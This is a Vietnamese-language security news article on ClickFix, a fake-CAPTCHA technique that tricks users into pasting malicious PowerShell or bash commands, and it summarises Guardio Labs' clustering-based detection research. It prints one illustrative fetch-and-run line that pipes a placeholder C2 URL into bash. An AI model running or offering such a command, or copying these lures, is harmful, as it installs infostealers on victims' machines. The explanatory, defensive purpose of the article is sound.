ClickFix, khởi nguồn là một công cụ mô phỏng red-team vào tháng 9 năm 2024, đã nhanh chóng phát triển thành một hệ thống phân phối **mã độc** phổ biến, vượt trội so với các tiền thân như lừa đảo cập nhật trình duyệt giả mạo ClearFake. **Mã độc ClickFix** hiện đang là mối quan ngại hàng đầu trong lĩnh vực an ninh mạng.

Ban đầu được chuyên gia bảo mật **John Hammond** trình diễn cho mục đích giáo dục, kỹ thuật CAPTCHA giả mạo này đánh lừa người dùng thực thi các lệnh PowerShell độc hại thông qua thao tác clipboard. Phương pháp này bỏ qua các quy trình tải xuống tệp truyền thống. Đến cuối năm 2024, ProofPoint đã đặt tên là **ClickFix**, nhấn mạnh sự chuyển dịch từ chiến thuật EtherHiding (giấu mã trong hợp đồng thông minh Ethereum) sang các kỹ thuật kỹ thuật xã hội tinh vi hơn.

Phân Tích Cuộc Tấn Công Mạng ClickFix và Tác Động

Biến thể **“CAPTCHAgeddon”** của **mã độc ClickFix** tận dụng cơ sở hạ tầng đáng tin cậy. Điều này cho phép các cuộc lây nhiễm drive-by và tấn công spear-phishing diện rộng, dẫn đến việc triển khai các **infostealer** như **Lumma**. Các **infostealer** này có khả năng trích xuất thông tin đăng nhập và dữ liệu một cách liền mạch, gây ra những rủi ro bảo mật nghiêm trọng cho người dùng và tổ chức.

Phương Thức Lây Lan và Phát Tán

Sự lây lan của **mã độc ClickFix** đã đa dạng hóa đáng kể. Ban đầu, nó phát tán thông qua malvertising trên các mạng lưới quảng cáo đáng ngờ nhắm mục tiêu vào các trang web phát trực tuyến và phần mềm. Hiện tại, các phương pháp phát tán chính bao gồm:

• **Xâm nhập nền tảng WordPress:** **Mã độc ClickFix** xâm nhập vào các nền tảng WordPress bị xâm phạm có thứ hạng SEO cao. Tại đây, các CAPTCHA giả mạo được phủ lên nội dung hợp pháp, kích hoạt bởi tương tác của người dùng để đạt được sự tích hợp tự nhiên.
• **Khai thác mạng xã hội:** Kẻ tấn công lợi dụng các nền tảng mạng xã hội và kho lưu trữ GitHub với các tệp README lừa đảo để dụ dỗ người dùng.
• **Trang web mồi được tối ưu hóa SEO:** Các trang web này chứa các bài viết bị làm mờ, buộc người dùng phải “xác minh” để truy cập nội dung, từ đó lây nhiễm **mã độc ClickFix**.

Kỹ Thuật Kỹ Thuật Xã Hội Tinh Vi

Về mặt kỹ thuật xã hội, các cuộc tấn công này sử dụng các kỹ thuật phức tạp, bắt chước các thách thức **reCAPTCHA** hoặc **Cloudflare**. Chúng hiển thị thương hiệu động bằng cách kéo logo trang web thông qua **AdZone ID** và đưa ra các lời nhắc khẩn cấp như “phát hiện IP đáng ngờ”. Điều này giúp tăng cường khả năng thuyết phục người dùng, khiến họ dễ dàng rơi vào bẫy của **mã độc ClickFix**.

Trong các chiến dịch phishing có mục tiêu, ví dụ như giả mạo Booking.com, kẻ tấn công chuyển hướng người dùng từ các trang có thương hiệu sang các CAPTCHA theo chủ đề. Mục tiêu cuối cùng là cài đặt các **stealer** để thu thập dữ liệu toàn diện thay vì chỉ một thông tin đăng nhập duy nhất.

Phân Tích Kỹ Thuật Evasion và Payload của Mã Độc ClickFix

Kỹ Thuật Che Giấu Mã Độc

Về mặt kỹ thuật, việc né tránh phát hiện của **mã độc ClickFix** xoay quanh các lệnh PowerShell bị xáo trộn. Kẻ tấn công sử dụng các biến thể chữ hoa/thường (ví dụ: PoWeRsHeLL), thủ thuật ASCII và tải tập lệnh động từ máy chủ của kẻ tấn công. Những kỹ thuật này giúp **mã độc ClickFix** né tránh các bộ quét tĩnh dựa trên chữ ký.

Phương Pháp Tải Payload

Các payload của **mã độc ClickFix** được nhúng vào các tệp có vẻ hợp pháp như socket.io.min.js trên các CDN giả mạo, hoặc lạm dụng Google Scripts để lưu trữ trên các miền đáng tin cậy. Điều này làm giảm đáng kể sự nghi ngờ và giúp mã độc bỏ qua các bộ lọc bảo mật.

Khả Năng Thích Ứng Đa Nền Tảng

Các bản thích ứng đa nền tảng của **mã độc ClickFix** mở rộng đến macOS và Linux thông qua các tập lệnh bash. Người dùng bị hướng dẫn dán các lệnh vào terminal, khai thác sự thiếu quen thuộc của người dùng không chuyên về kỹ thuật. Đến giữa năm 2025, các phương pháp này đã mở rộng bề mặt tấn công đáng kể, với các ví dụ được giải mã cho thấy các lời gọi curl đơn giản tìm nạp payload từ xa.

Ví dụ về lệnh CLI (Minh họa):

curl -sL [URL_PAYLOAD_C2] | bash

Phân Tích Mối Đe Dọa và Phương Pháp Phát Hiện

Để phân tích bối cảnh mối đe dọa này, các nhà nghiên cứu tại Guardio đã áp dụng thuật toán phân cụm **DBSCAN** trên hàng nghìn payload clipboard. Họ trích xuất các đặc điểm như độ entropy của miền, các mẫu xáo trộn và cấu trúc lệnh. Đây là một phương pháp quan trọng để hiểu rõ hơn về hoạt động của **mã độc ClickFix**.

Cách tiếp cận không giám sát này đã xác định các cụm riêng biệt. Ví dụ, **Cụm 16** cho thấy các lần tìm nạp PowerShell đồng nhất, không bị xáo trộn từ các TLD **.run**/**.press** với các đường dẫn **UUID**, cho thấy các bộ công cụ được chia sẻ. Các cụm khác hiển thị sự xáo trộn nặng hoặc các hỗn hợp đa nền tảng, giúp lập bản đồ hồ sơ kẻ tấn công để chặn chủ động. Mối đe dọa mạng này đòi hỏi một cách tiếp cận bảo mật chủ động và linh hoạt.

Bài viết chi tiết từ Guardio Labs về “CAPTCHAgeddon”: CAPTCHAgeddon – Unmasking the Viral Evolution of the ClickFix Browser-Based Threat.

Kết Luận và Khuyến Nghị Bảo Vệ

Sự phát triển của **mã độc ClickFix** nhấn mạnh một sự biến đổi virus trong **mối đe dọa mạng**, thay thế các chủng cũ hơn thông qua khả năng lây nhiễm vượt trội. Các nhà bảo vệ cần ưu tiên phân tích hành vi hơn là dựa vào chữ ký tĩnh, vì các công cụ như **ClickFix** báo hiệu những sự thích nghi tiếp theo của các chiến thuật tấn công.

Việc nắm bắt các mô hình tấn công mới nổi và các **mối đe dọa mạng** đang phát triển là rất quan trọng để xây dựng các chiến lược phòng thủ hiệu quả. **Mã độc ClickFix** là một minh chứng rõ ràng cho sự cần thiết của các biện pháp bảo mật chủ động và khả năng thích ứng liên tục.